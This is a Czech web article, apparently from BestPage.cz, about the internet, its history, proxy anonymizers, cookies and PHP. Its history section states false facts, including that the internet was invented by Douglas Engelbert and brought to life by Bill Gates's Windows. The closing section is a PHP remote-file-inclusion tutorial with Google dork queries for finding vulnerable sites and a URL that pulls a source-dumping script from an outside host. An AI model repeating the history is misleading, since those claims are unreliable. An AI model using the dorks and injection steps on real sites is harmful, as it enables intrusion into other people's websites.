Co je internet?
Internet je něco co není vidět, internet nemá hranice, internet není nic hmatatelného. Co je to tedy vlastně internet? Šlo by to říci takto: Internet je jedna velká počítačová síť, která funguje s podporou IP (internet protocol) protokolu. Počítače se do této sítě připojují IP adresou, kterou jsou také v síti identifikovány, případně sledovány. Do sítě internet se můžete připojit pomocí různých technologií, jde např. o ADSL, ISDN, bezdrátou sítí Wi-Fi, také mobilně přes technologie LTE, GPRS, EDGE, CDMA. IP adresy jsou buďto pevné (IP adresa je neměnná, s každém připojení k internetu je stejná), nebo IP adresy dynamické (IP adresa je proměnlivá, s každém připojení k internetu je jiná). Lepší je mít samozdřejmě dynamickou ip adresu (např. vysokorychlostní připojení CDMA připojení), z mnoha důvodů (např. neomezené stahování z Rapishare, ztížená identifikace PC v síti atp.).
Historie internetu
Teoreticky vznikl internet ve Švýcarsku, nicméně byl vytvořen v USA. Teoreticky vynalezl internet Douglas Engelbert, mj. vynálezce počítačové myši. V roce 1988 Ted Nelson začal spolupracovat s firmou Autodesk na projektu nazývaný „Xanadu“, který ale neměl úspěch. Dalším budovatelem internetu byl Charles Goldfarb, který vytvořil programovací jazyk SGML, předchůdce nynějšího HTML. Život dal internetu teprve Bill Gates, když vytvořil operační systém Windows. Už v roce 1992 existovalo několik desítek vzájemně propojených serverů na světě, ale již v roce 1995 je na světě necelých 100 tisíc počítačových serverů. V Česku se začalo mluvit o internetu v roce 1990 s podporou operačního systému Unix, teprve v roce 1994 dochází¨v Česku zavádění internetu do běžného života lidí. V Česku se internet rozvíjel bez účasti státu, ale v USA vyvíjela hlavně vláda, zpočátku především k vojenským účelům. Internet v dnešní podobě využívá nejmoderněších technologií, jde např. HTML, PHP, CSS atp., používají se nejmodernější internetové prohlížeče, jde např. o Mozillu Firefox, Operu, nástavbu Internet Expoloreru Avant Browser atp. .
Internet a počítač
Co by byl internet bez počítače? Ničím! Jsou to dvě technologie, které spolu úzce souvisejí a které se prolínají.
Internet a člověk
Internet dnes používá 53% obyvatel České republiky, z toho 37% domácností, viz. výzkum agentury Factum Invenio z roku 2007. Tato čísla však nejsou nijak vysoká, protože v zahraničí používá internet podstatně více lidí. Rozhodně je to v ceně připojení k internetu, protože ta je bohužél v ČR ještě dost vysoká. Internet se stal součástní dnešního života lidí, z níž mnozí lidé se mu podřizují. Internet je zdroj mnoha užitečných informací. K internetu má přístup v podstatě každý, lidi různého věku, postavení, mentality, národnosti atp. . Internet je mnohdy lehce zneužitelný, resp. lidi ho zneužívají někdy ke svému prospěchu, jindy ke svému chtíči. Prostřednictvím internetu vznikla nejednomu uživateli škoda, ať už jde o ztrátu citlivých dat, informací, poškození počítače či k nezákonnému převodu peněz. Nicméně v mnoha případech si za toto může uživatel internetu v podstatě sám, sice tím že má pramálo zabezpečený počítač. Jde především o absenci firewallu, používání home licencí antiviru, Anti-Malware software. Internet je dobrý pomocník, ale zničil životy dosti lidí.
Anonymita a internet
Na internetu anonymní rozhodně nejste, to čím jste indentifikovatelní je vaše IP adresa. Prostřednictvím IP adresy může dojít celkovému monitoringu vašeho pohybu v síti. Jedním nejefektivnějším způsobem, jak skrýt svou IP adresu je použít anonymní proxy server. Proxy se dělí do 4 skupin: 1.HTTP Proxy – nejpoužívanější proxy, CGI Proxy – anonymizer, 3. FTP Proxy – proxy na FTP servery, 4. SOCKS Proxy – proxy zaměřená na TCP, UDP. CGI Proxy, tedy webový anonymizer nabízí i tento portál BestPage.cz, nutno ještě podotknout, že BestPage.cz nabízí svůj anonymizer zcela zdarma a bez reklamy, což je vcelku vzácnost. Dost důležité je také neustále mazat cookies z počítače, protože ty vás také prozrazují.
Seznam osvědčených CGI Proxy Anonymizérů:
Kroxy.com (Rusko), Anonymizer.in , Anonymouse.org , Vtunnel.com , Totprox.com , Yupoo.com (Čína) , Unblockonline.com (USA) , Hayaletim.net , Nntime.com
Cookies (česky koláček)
Cookies jsou takové miniaturní soubory uložené ve vašem počítači, které jste získali prohlížením internetu, tedy získáte je prohlížením www stránek. Je to v podstatě informace, že jste navštívili ten a ten web. Pokud cookies otevřete, tak uvidíte řadu čísel, jsou to čísla která vás identifikují, tedy podle kterých vás poznají, že jste již na webu byl. Každá cookies má v sobě uložena data ze kterého serveru je a jedině ten si jí může zase přečíst,tj. cookies uložené z webu abcd.cz si nemůže přečíst nikdo jiný, toto platí také naopak. Nicméně pokud je webu xyz.biz nějaký reklamní či statistický systém, potom vám maže cookies uložit potenciální reklamní server, protože jeho software je uložen na webu abcd.cz. Některé cookies mají svou časovou platnost, např. cookies o přihlášení platí jen určitou dobu, po této době se cookies ve vašem počítači automaticky smaže a přihlášení je poté neplatné. Jiné cookies jsou trvanlivé, které vám v počítači zůstávají. Díky cookies dokáže server rozeznat uživatele během dalších zobrazení příslušné stránky. Na principu cookies je také založena většina služeb, jež vyžadují identifikaci internetového uživatele, který navštěvuje jednotlivé stránky, jako např. nakupování ve virtuálních obchodech, elektronického bankovnictví. Nebýt cookies, uživatel který například používá elektronický bankovní systém, by musel uvádět heslo na každé stránce. Cookies jsou uloženy na disku C ve složce Documents and Settings.
Cookies můžete zakázat ve svém prohlížeči , avšak na některých stránkách jsou však cookies povinné, jinak si na potenciální stránce nic neprohlédnete.
Rizika cookies
Jak jsem již řekl, cookies nesou určitá rizika, dá se říci že v určitých případech až závažná rizika. Cookies jsou nejčastěji používána k identifikaci návštěvníka stránky, resp. k jeho špehování. Jak se toto všechno provádí? Cookies prohlížené stránky jsou uloženy ve vašem počítači (tyto cookies zpravidla nemají časovou platnost a jsou ve vašem počítači uloženy napořád, tedy poked je samy neodstarníte), tímto úkonem jste označeni, resp. váš počítač. Pomocí cookies se dá sledovat, jaké stránky si prohlížíte, co vyhledáváte atp. Největší zájem o vaše cookies uložené ve vašem počítače rozhodně mají stránky, které se zajímají o reklamu a vyhledávače. S reklamou je to velice průhledné – vědí co vás zajímá a poté vám začne chodit spoustu nevyžádané pošty atp.. Avšak s vyhledávačema je to obdobné – vědí co vyhledáváte, slova, větná spojení. Při zadání slova do vyhledávače se vám cookies zapíše do vašeho počítače a vyhledávač už ví co vás zajímá. Za pár hledáte ve stejném vyhledávači, vyhledávač vás okamžitě identifikuje, vy zadáte slovo které chcete vyhledat, vyhledávač vám toto slovo vyhledá, ale nabídne vám také odkazy na slova které jste zadávala minule.
Rizika cookies
Pokud si myslíte, že jsou pro vás cookies ohrožující, tak je můžete zakázat přímo v prohlížeči, např. Internet Explorer – Nástroje > Možnosti sítě internet > Soukromí > Pokročilé, v každém prohlížeči je to vždy v Nastavení. Cookies lze také odmítnout na zadaný server, nebo lze je nastavit tak že každá cookies bude podléhat vašemu schválení – budete upozorněni na ukládání cookies do vašeho počítače a budete je moci nechat uložit anebo odmítnout. Tyto rady sice zní hezky, jako by tím byl problém vyřešen, ale pozor v případě odmítání cookies budete na 99% stránkách velice omezeni, např. se vám nebudou zobrazovat obrázky, v mnoha stránkách jsou dokonce cookies povinné, takže si tam neprohlédnete a ni přečtete vůbec nic. Úplně odmítnutí cookies je určitě nesmysl, spíše je doporučuju buďto schvalovat, nebo pravidelně mazat z vašeho počítače (denně, několikrát denně po prohlížení internetu). Lze k tomu použít dobrý nástroj program CCleaner (zdarma a česky), který si můžete stáhnou zde na BestPage.cz v sekci Software. Pokud budete v nastavení prohlížeče, tak tam zakažte také ActiveX, prvky které jsou také hodně ohrožující pro vás počítač.
Krádež cookies
Možná nevíte, ale cookies lze z vašeho počítače zcizit, říká se tomu krádež cookies. Krádež cookies je bohužél něco tak jednoduchého co si ani nedovete představit, tedy za předpokladu že víte jak na to, nejde pouze o jednoduchost ale i rychlost jaká je krádež dokonána, je to zlomek vteřiny který ani nepostřehnete. Vše se odehrává takto: stačí kliknou na zadaný hypertextový odkaz (vzpomínáte si jak vám přišel spamový email, kde byl jenom nějaký odkaz na nějakou stránku – hodně dlouhý odkaz?, nebo vzpomínáte si jak byl někde na stránce odkaz – klikněte a dostanete něco zdarma?), na stránce stránce je zadán škodlivý, krádežnický HTML kód – javascript sloužící ke krádeži cizích cookies. Pokud kliknete na takovýto odkaz, tak se během mikrovteřiny, kterou nepostřehnete – asi ani nemůžete postřehnou, odehraje krádež veškerých vašich cookies z vašeho počítače, tak že kliknutí na takový odkaz odešle společně s požadavkem hlavičku referer, ze které útočník zjistí session-id, poté jsou vaše cookies zaslány php scriptu, který… . Nebudu psát podrobný návod, abych někomu nedal podnět vykrádat počítače (cookies). Možná si teď říkáte, tak ať si je někdo ukradne, když mu to pomůže…, vždyť je mu to stejně k ničemu. Ale věřte, že ke krádežím cookies nedochází jen tak, ale útočník moc dobře ví, že cookies obsahují mj. i různé přihlašovací údaje (loginy, hesla) k emailům, chatu, fóru atd. ! Ještě si myslíte, že cookies nenesou žádná nebezpečí?
PHP
PHP je scriptovací jazyk, tato zkratka znamená – Personal Home Page Construction Kit (původně Personal Home Page Tools). Historie PHP sahá do roku 1994, kdy jistý Rasmus Lerdorf napsal v Perlu jednoduchý systém k evidování přístupu k jeho www stránkám. Vzhledem k neustálému spouštění interpretru Perlu velmi zatěžovalo server, proto přepsal autor systém do jazyka C. Vše se zalíbilo i ostatním uživatelům serveru, kteří vyžadovali nová a nová vylepšení. Nicméně celosvětově a masově se začalo používat PHP v roce 1998 – PHP/FI 2.0, jednalo se programovací jazyk, který se zapisoval do HTML.
Funkčnost PHP
PHP běží na straně serveru a vkládá se přímo do www stránek, kde je požadavek zpracován HTTP serverem, požadavek je zpracován a odeslán výsledek.
PHP je moderní scriptovací jazyk, který má obrovské množství funkcí a tím pádem i možností. PHP jazykem lze naprogramovat prakticky cokoli. Častým problémem bývají freehostingy, které mají omezené PHP funkce. Jako příklady PHP uvádím pár příkladů, PHP scriptů:
Detekce IP adresy:
<? $ref = $REMOTE_ADDR; echo „Vaše IP adresa je: „; echo $ref; ?>
Zasílání ip adresy návštěvníka webu na email:
<? mail(„nazev@server.cz“, „IP adresa“, $REMOTE_ADDR) ?>
PHP dokáže:
-práci s textem, z nichž převářná většina podporuje CZ lokalizaci
-podporu regulárních výrazů
-matematické funkce všeho druhu
-práci s datumem, časem
-práci se soubory, adresáři
-přístup do adresářových služeb LDAP
-čtení záznamů DNS, převody mezi IP a doménovými adresami, sockety
-přístupovat k datům pomocí rozhraní ODBC
-odesílání emailů, protkol IMAP
-vygenerování formátu GIF (obrázek)
-protokol SNMP – čtení informací
-podpora komprese, dekomprese dat
-podporu databází: dBase, FilePro, dbm
-mSQL, MySQL, Sybase, Informix, Adabas D, MS SQL Server, PostgreSQL, Solid,
-zpracování dat z www formuláře
-podporovat cookies
-spouštět a zpracovávat výstup externího softwaru
-podpora XML
Zneužívání PHP
Jak jsem se již zmínil, pomocí PHP lze naprogramovat prakticky cokoli. Bohužél ty dobré věci bývají často zneužity k nelegálním účelům. PHP scriptovací jazyk bývá často zneužit k hackingu, hackerským praktickám, takový dobře a zprávně vymyšlený PHP script dokáže získat např. přihlašovací údaje k emailu, www hostingu, FTP, Icq protokolu, Skype …, stačí mít dokonalé znalosti PHP jazyka. Netvrdím, že je jednoduché vymyslet a napsat takový PHP script, protože většina systémů má obranu proti takovým scriptům. V takovýchto případech není důležitý pouze škodlivý PHP script, ale je k zapotřebý i děravost nějakého systému.
PHP injection – návod slouží, jako demonstrace zabezpečení vlastních webových stránek:
PHP scriptovací jazyk bývá velmi často používán k tzv. PHP INJECTION. Php injection je častá chyba administrátorů www stránek, prostřednictvím této chyby lze hacknout web. V případě, že je stránka napadnutelná, tak obsahuje v HTML kódu toto: <? include($promenna); ?> . Napadnutelná URL vypadá takto: http://www.nazev.cz/index.php?promenna=stranka.html (daná stránka může mít přípony: HTM, HTML, PHP). Příklad napadnutelnosti stránky: http://www.nazev.cz/index.php?page=https://bestpage.cz , v případě že se v tomto případě objevuje v prohlížeči stránka Bestpage.cz, tak je web napadnutelný. K vyhledávání takto napadnutelných webů se používá Google.com, příkazy: inurl:“stranka.cz/*.php?page=*.php“ (stranka.cz – je měnné) , inurl:index.php?page= (page – je měnné např. na: stranka, include, main atp.). PHP script umožňující výpis kódu:
<? show_source(„index.php“) ?>
Script uložte do poznámkové bloku s názvem script.txt a nahrajte ho na server. Pokud je vaše stránka napadnutelná, tak zadejte do prohlížeče tento odkaz: http://www.stranka.cz/index.php?page=http://kdejescript.cz/script.txt . To je vše – zobrazí se vám zdrojový kód indexu.php.